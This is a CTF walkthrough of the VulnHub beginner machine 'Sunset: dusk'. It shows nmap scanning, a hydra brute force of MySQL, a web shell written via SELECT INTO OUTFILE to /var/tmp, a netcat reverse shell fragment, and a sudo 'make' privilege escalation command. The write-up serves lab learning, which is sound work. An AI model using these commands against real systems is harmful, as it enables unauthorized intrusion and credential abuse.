Sunset: dusk is another CTF challenge given by vulnhub and the level difficultly is set according to beginners and credit goes to whitecr0wz. You have to hunt two flags, and this is a boot to root challenge. Download it from here.
Penetration Testing Methologies
Network scaning
· Nmap
· Netdiscover
· Weak credentials
· PHP file injection
Exploiting RCE
Privilege Escalation
· Sudo rights
· Docker
Network Scanning
First of all, we try to identify our target. We did this using the netdiscover command.
Now that we have identified our target using the above command, we can continue to our next step i.e. scanning the host IP to identify open ports and running services. We will use Nmap to scan the target with the following command:
nmap -A
As result we found multiple open ports and services are running across them thus, we need to enumerate further to step ahead.
We’ve start the enumeration with FTP and HTTP and tried to find some suspicious information but unfortunately fail to get any remarkable clue thus we tried for mysql brute force attack with the help of hydra using rockyou.txt file.
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql
And we found the login creds for mysql where username is root and password is password which also considered as weak credential.
We also navigate to port 8080 and it looks like, that page is displaying the list of the current directory, here author has left the hint for writable directory /var/tmp. Thus, it become easy for us deface the machine using these loopholes.
Since we have mysql cred and we also know the working directory is /var/tmp and with the help of this we can inject malicious PHP code as SQL query into a file named “raj.php”. This will generate an RCE and as result we will be able to spawn host machine by exploiting it.
select “” into outfile ‘/var/tmp/raj.php’ ;
So, again we navigate to port 8080 and saw the entry for raj.php file.
It was time to execute raj.php and verify the RCE parameter by executing following URL:
Thus, we find that we are able to run system command through this page.
It was time to exploit RCE, thus we used the netcat reverse shell to spawning shell o host machine. -e /bin/bash 1234
Bravo!! We hit the goal and spawn the shell of host the machine and found the 1st flag user.txt in the /home/dusk.
Privilege Escalation
Further we move towards privilege escalation and identify the sudo rights for www-data and notice that user:www-data holds sudo rights for “make” & “sl” program but here we try to escalate to shell for user:dusk by exploiting make program.
sudo -u make -s --eval=$'x:\n\t-'"$COMMAND”
After executing above command, we were able to access the host shell as user dusk who is also the member of the docker group.